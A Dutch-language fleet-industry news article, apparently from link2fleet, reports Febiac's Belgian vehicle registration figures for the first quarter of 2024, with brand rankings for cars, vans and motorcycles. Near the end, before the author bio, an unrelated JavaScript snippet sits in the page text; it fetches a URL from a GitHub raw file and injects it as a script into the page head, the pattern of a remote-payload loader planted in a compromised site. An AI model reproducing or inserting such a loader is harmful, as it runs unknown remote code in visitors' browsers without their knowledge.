Gepubliceerd op 8 April 2024 om 09h25
Door Kevin Kersemans

Belgische inschrijvingen: positief eerste kwartaal

Febiac heeft de inschrijvingscijfers voor het eerste kwartaal van 2024 bekendgemaakt. In vergelijking met dezelfde periode vorig jaar vertonen die een lichtjes positieve trend. Het populairste merk blijft BMW.

|||
||| © |||

De Belgische personenwagenmarkt heeft zijn beste eerste kwartaal achter de rug sinds 2020 en het uitbreken van de coronapandemie. Voor die van de lichte bedrijfsvoertuigen gaat het om het beste eerste kwartaal sinds 2021 en voor die van de motorfietsen zelfs sinds 2019. De voorbije maand liet in de eerste twee gevallen weliswaar een daling optekenen ten opzichte van vorig jaar (respectievelijk -13,5 en -14,4%), maar dat komt volgens Febiac grotendeels door het lagere aantal werkdagen in maart 2024.

Nochtans werden er de voorbije maand wel meer motorfietsen ingeschreven dan in maart 2023 (+2,9%). Over de eerste drie maanden gezien is de balans overal positief, zowel bij de personenwagens (+2,78%) als bij de bestelwagens (+1,76%) en bij de motorfietsen (+5,9%). Van januari tot maart 2024 werden 135.140 nieuwe personenwagens, 18.211 nieuwe bestelwagens en 6.691 nieuwe motorfietsen ingeschreven.

BMW boven

Bij de personenwagens komt BMW (opnieuw) als grote winnaar uit de bus. Het merk deed nog 8,22% beter dan vorig jaar en wist met 14.243 inschrijvingen van januari tot maart 2024 zijn marktaandeel te vergroten tot 10,54%. Dochtermerk Mini (plaats 22) wist echter 42,63% minder auto’s in te schrijven als vorig jaar. Op de tweede plaats staat Volkswagen, maar verder wordt de top 5 vervolledigd door nog drie andere premiummerken, namelijk Audi, Mercedes en Volvo – met dank aan de populariteit van fleetauto’s in ons land wellicht.

De grootste verliezers zijn procentueel gezien Lynk & Co (-82,57%) en Subaru (-50,34%), al vallen die percentages natuurlijk te relativeren gezien de bescheiden volumes. Minder rooskleurig ziet het eruit voor de Stellantis-merken Fiat, DS en Opel, die er respectievelijk 48,81%, 46,64% en 42,24% op achteruitgaan. Dan doen Peugeot en Citroën, die eindigen op de tiende en de vijftiende plaats, het beter.

Procentueel de grootste stijger is Smart, dat 586,36% meer auto’s wist in te schrijven als in de periode januari tot maart 2023. We hebben het dan echter over 129 stuks tegenover… 22. Nog zo’n grote sprong maakt BYD (+261,54%), door van 117 naar 423 exemplaren te gaan. Een andere opvallende stijger is Honda, dat bijna twee keer meer auto’s inschreef als vorig jaar.

Honda houdt stand

Bij de motorfietsen is het datzelfde Honda (+1,26%) dat opnieuw de eerste plaats bezet, gevolgd door… BMW. Dat laatste verliest echter terrein, want over het volledige eerste kwartaal gaat het Duitse merk er 11,25% op achteruit, waardoor Yamaha op plaats 3 steeds dichter in de buurt begint te komen (+37,35%).

Een opvallende stijger bij de motorfietsen is Silence, dat door 178 e-scooters (en microcars) te verkopen, tegenover 9 vorig jaar, nu plaats 10 in het klassement van de inschrijvingen opeist.

Stabiele LCV’s

Bij de bestelwagens zijn de inschrijvingen met respectievelijk 15,96 en 13,77% gedaald voor de twee populairste merken (Renault en Ford), terwijl nummer drie, vier en vijf er juist op vooruitgingen (+13,13% voor Mercedes, +32,35% voor Volkswagen en +52,39% voor Peugeot). De rangorde blijft echter ongewijzigd en Renault blijft marktleider, al daalde het aandeel wel van 19,82% in de eerste drie maanden van 2023 naar 16,37% voor het eerste kwartaal van 2024.

Bij de bestelwagens doen de Stellantis-merken het duidelijk beter dan bij de personenwagens, want hier vinden we Peugeot en Citroën op de vijfde en de zesde plaats en Opel en Fiat op plaats acht en negen. Ook bij de bestelwagens maken Chinese merken opmars, al blijft het voorlopig nog om bescheiden volumes gaan. Zo werden van januari tot maart dit jaar 77 LCV’s van Maxus ingeschreven, tegenover 44 in dezelfde periode van 2023.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Kevin Kersemans

Kevin Kersemans, redacteur van dit artikel

Kevin Kersemans is autojournalist met al enkele decennia ervaring op de teller. Zijn passie voor auto's en alles op wielen heeft hij al van kindsbeen af. Voor link2fleet volgt hij vooral de auto-actualiteit en test hij nieuwe modellen.
Dit artikel gaat over: Expertise & Federaties , Vlootbeheer

Gelijkaardige artikels